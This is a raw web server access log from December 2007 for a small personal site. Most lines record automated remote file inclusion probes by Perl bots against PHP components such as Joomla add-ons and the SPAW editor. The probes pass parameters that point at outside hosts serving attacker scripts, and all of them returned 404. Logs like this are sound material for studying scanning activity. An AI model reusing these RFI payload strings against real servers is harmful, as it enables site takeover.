216.75.35.118 - - [18/Dec/2007:23:41:13 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [18/Dec/2007:23:41:13 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.232 - - [18/Dec/2007:23:44:03 -0800] "GET /bikes/ HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.75.35.118 - - [18/Dec/2007:23:44:46 -0800] "GET /logs/access_071202.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [18/Dec/2007:23:44:46 -0800] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [18/Dec/2007:23:44:46 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [18/Dec/2007:23:44:46 -0800] "GET /logs/access_071202.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [18/Dec/2007:23:44:46 -0800] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [18/Dec/2007:23:44:46 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.225 - - [18/Dec/2007:23:46:37 -0800] "GET /bikes/?D=A HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.75.35.118 - - [18/Dec/2007:23:52:09 -0800] "GET /logs/access_071205.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [18/Dec/2007:23:52:09 -0800] "GET /logs/access_071207.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [18/Dec/2007:23:52:09 -0800] "GET /logs/access_071205.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [18/Dec/2007:23:52:10 -0800] "GET /logs/access_071207.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.199.21 - - [18/Dec/2007:23:53:31 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.13.63.73 - - [18/Dec/2007:23:54:00 -0800] "GET /logs/access_071116.log/!rfihttp://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.13.63.73 - - [18/Dec/2007:23:54:00 -0800] "GET /!rfihttp://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.13.63.73 - - [18/Dec/2007:23:54:01 -0800] "GET /logs/!rfihttp://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.13.63.73 - - [18/Dec/2007:23:54:01 -0800] "GET /logs/access_071203.log/!rfihttp://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.122.113 - - [18/Dec/2007:23:54:26 -0800] "GET /logs/access_071116.log/!rfihttp://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.122.113 - - [18/Dec/2007:23:54:26 -0800] "GET /logs/access_071116.log/!rfihttp://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.122.113 - - [18/Dec/2007:23:54:27 -0800] "GET /!rfihttp://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.122.113 - - [18/Dec/2007:23:54:27 -0800] "GET /!rfihttp://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.122.113 - - [18/Dec/2007:23:54:27 -0800] "GET /logs/!rfihttp://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.122.113 - - [18/Dec/2007:23:54:27 -0800] "GET /logs/!rfihttp://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.122.113 - - [18/Dec/2007:23:54:27 -0800] "GET /logs/access_071203.log/!rfihttp://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.122.113 - - [18/Dec/2007:23:54:27 -0800] "GET /logs/access_071203.log/!rfihttp://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.13.63.73 - - [18/Dec/2007:23:54:53 -0800] "GET /logs/access_071116.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.13.63.73 - - [18/Dec/2007:23:54:53 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.13.63.73 - - [18/Dec/2007:23:54:54 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.13.63.73 - - [18/Dec/2007:23:54:57 -0800] "GET /logs/access_071203.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.122.113 - - [18/Dec/2007:23:55:34 -0800] "GET /logs/access_071116.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.122.113 - - [18/Dec/2007:23:55:34 -0800] "GET /logs/access_071116.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.122.113 - - [18/Dec/2007:23:55:34 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.122.113 - - [18/Dec/2007:23:55:34 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.122.113 - - [18/Dec/2007:23:55:34 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.122.113 - - [18/Dec/2007:23:55:35 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.122.113 - - [18/Dec/2007:23:55:41 -0800] "GET /logs/access_071203.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.122.113 - - [18/Dec/2007:23:55:41 -0800] "GET /logs/access_071203.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.134.31.125 - - [18/Dec/2007:23:56:20 -0800] "GET /logs/access_071116.log/!rfihttp://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.134.31.125 - - [18/Dec/2007:23:56:20 -0800] "GET /!rfihttp://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.134.31.125 - - [18/Dec/2007:23:56:21 -0800] "GET /logs/!rfihttp://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.134.31.125 - - [18/Dec/2007:23:56:21 -0800] "GET /logs/access_071203.log/!rfihttp://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.195.182 - - [18/Dec/2007:23:57:41 -0800] "GET /logs/access_071116.log/!rfihttp://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.195.182 - - [18/Dec/2007:23:57:46 -0800] "GET /logs/!rfihttp://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.24.26 - - [18/Dec/2007:23:58:29 -0800] "GET /logs/access_070926.log HTTP/1.0" 200 34093 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.134.31.125 - - [19/Dec/2007:00:04:16 -0800] "GET /logs/access_071116.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.134.31.125 - - [19/Dec/2007:00:04:17 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.134.31.125 - - [19/Dec/2007:00:04:17 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.134.31.125 - - [19/Dec/2007:00:05:58 -0800] "GET /logs/access_071203.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.195.182 - - [19/Dec/2007:00:06:15 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.195.182 - - [19/Dec/2007:00:06:15 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.27.146 - - [19/Dec/2007:00:09:51 -0800] "GET /skin/zero_vote/error.php?dir=http://theseoguide.com/cache/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.13.63.73 - - [19/Dec/2007:00:16:46 -0800] "GET /logs/access_071205.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.134.31.125 - - [19/Dec/2007:00:23:15 -0800] "GET /logs/access_071205.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.141.149 - - [19/Dec/2007:00:24:48 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.141.149 - - [19/Dec/2007:00:24:48 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.141.149 - - [19/Dec/2007:00:24:51 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.141.149 - - [19/Dec/2007:00:24:51 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.141.149 - - [19/Dec/2007:00:25:15 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.141.149 - - [19/Dec/2007:00:25:15 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.199.21 - - [19/Dec/2007:00:25:34 -0800] "GET /logs/access_071202.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.199.21 - - [19/Dec/2007:00:25:35 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.20.122.113 - - [19/Dec/2007:00:29:31 -0800] "GET /logs/access_071205.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.122.113 - - [19/Dec/2007:00:29:32 -0800] "GET /logs/access_071205.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.26.137 - - [19/Dec/2007:00:29:53 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.17.199.21 - - [19/Dec/2007:00:31:20 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.195.182 - - [19/Dec/2007:00:33:51 -0800] "GET /logs/access_071205.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.17.199.21 - - [19/Dec/2007:00:36:20 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.199.21 - - [19/Dec/2007:00:36:21 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.175.205.226 - - [19/Dec/2007:00:39:14 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.27.146 - - [19/Dec/2007:00:41:37 -0800] "GET /logs/access_071202.log/skin/zero_vote/error.php?dir=http://theseoguide.com/cache/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.27.146 - - [19/Dec/2007:00:41:37 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://theseoguide.com/cache/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.175.205.226 - - [19/Dec/2007:00:45:21 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.175.205.226 - - [19/Dec/2007:00:45:22 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.199.21 - - [19/Dec/2007:00:50:38 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [19/Dec/2007:00:55:03 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [19/Dec/2007:00:55:26 -0800] "GET /megumi/Necklace/6_Turquoise_Leather_Choker_Set_20.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
195.13.63.73 - - [19/Dec/2007:00:55:46 -0800] "GET /logs/access_071202.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [19/Dec/2007:00:55:49 -0800] "GET /megumi/Necklace/5_Turquoise_Sterling_Slver_sets_30.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [19/Dec/2007:01:00:45 -0800] "GET /megumi/Bracelet/5_Matching_Necklace_Labradorite_40.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
82.134.31.125 - - [19/Dec/2007:01:01:57 -0800] "GET /logs/access_071202.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.28.161 - - [19/Dec/2007:01:04:30 -0800] "GET /logs/scripts.log HTTP/1.0" 200 135781 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
91.121.82.85 - - [19/Dec/2007:01:06:57 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.82.85 - - [19/Dec/2007:01:06:57 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.82.85 - - [19/Dec/2007:01:08:28 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://darkscan.t35.com/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.82.85 - - [19/Dec/2007:01:08:28 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.82.85 - - [19/Dec/2007:01:08:28 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://darkscan.t35.com/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.82.85 - - [19/Dec/2007:01:08:28 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.195.182 - - [19/Dec/2007:01:15:56 -0800] "GET /logs/access_071202.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.175.205.226 - - [19/Dec/2007:01:18:39 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.29.138 - - [19/Dec/2007:01:32:11 -0800] "GET /logs/access_071202.log/skin/zero_vote/error.php?dir=http://www.monstagames.nl/accountsystem/js/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.29.138 - - [19/Dec/2007:01:32:37 -0800] "GET /skin/zero_vote/error.php?dir=http://www.monstagames.nl/accountsystem/js/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.29.138 - - [19/Dec/2007:01:32:37 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://www.monstagames.nl/accountsystem/js/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.118 - - [19/Dec/2007:01:34:06 -0800] "GET /funny/ HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.20.122.113 - - [19/Dec/2007:01:40:05 -0800] "GET /logs/access_071202.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.122.113 - - [19/Dec/2007:01:40:05 -0800] "GET /logs/access_071202.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.25.107 - - [19/Dec/2007:01:42:57 -0800] "GET /funny/?N=D HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.86.81.56 - - [19/Dec/2007:01:48:01 -0800] "GET /index.php?autoLoadConfig%5b999%5d%5b0%5d%5bautoType%5d=include&autoLoadConfig%5b999%5d%5b0%5d%5bloadFile%5d=http://volta21.110mb.com/2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.175.205.226 - - [19/Dec/2007:01:48:14 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.86.81.56 - - [19/Dec/2007:01:49:57 -0800] "GET /logs/access_071203.log/index.php?autoLoadConfig%5b999%5d%5b0%5d%5bautoType%5d=include&autoLoadConfig%5b999%5d%5b0%5d%5bloadFile%5d=http://volta21.110mb.com/2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.81.56 - - [19/Dec/2007:01:49:57 -0800] "GET /logs/index.php?autoLoadConfig%5b999%5d%5b0%5d%5bautoType%5d=include&autoLoadConfig%5b999%5d%5b0%5d%5bloadFile%5d=http://volta21.110mb.com/2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.82.85 - - [19/Dec/2007:01:55:34 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.20.143 - - [19/Dec/2007:01:55:53 -0800] "GET /funny/?S=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.79.163.27 - - [19/Dec/2007:01:56:23 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://volta21.110mb.com/bd8.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.27 - - [19/Dec/2007:01:56:23 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://volta21.110mb.com/bd8.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.27 - - [19/Dec/2007:01:56:23 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://volta21.110mb.com/bd8.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.172 - - [19/Dec/2007:01:59:32 -0800] "GET /retreat1/?D=A HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
91.121.82.85 - - [19/Dec/2007:01:59:53 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://darkscan.t35.com/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.81.56 - - [19/Dec/2007:02:06:39 -0800] "GET /content/multithumb/multithumb.php?mosConfig_absolute_path=http://volta21.110mb.com/2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.29.138 - - [19/Dec/2007:02:15:08 -0800] "GET /logs/access_071129.log/include/inc_ext/phpsniff/phpSniff.core.php?phpwcms[wysiwyg_editor]=http://www.monstagames.nl/accountsystem/js/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.29.138 - - [19/Dec/2007:02:15:09 -0800] "GET /include/inc_ext/phpsniff/phpSniff.core.php?phpwcms[wysiwyg_editor]=http://www.monstagames.nl/accountsystem/js/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.29.138 - - [19/Dec/2007:02:15:09 -0800] "GET /logs/include/inc_ext/phpsniff/phpSniff.core.php?phpwcms[wysiwyg_editor]=http://www.monstagames.nl/accountsystem/js/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.86.81.56 - - [19/Dec/2007:02:20:26 -0800] "GET /logs/access_071110.log/content/multithumb/multithumb.php?mosConfig_absolute_path=http://volta21.110mb.com/2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.81.56 - - [19/Dec/2007:02:20:27 -0800] "GET /logs/content/multithumb/multithumb.php?mosConfig_absolute_path=http://volta21.110mb.com/2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.79.163.27 - - [19/Dec/2007:02:21:45 -0800] "GET /logs/access_071129.log/convert/mvcw.php?vwar_root=http://volta21.110mb.com/bd8.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
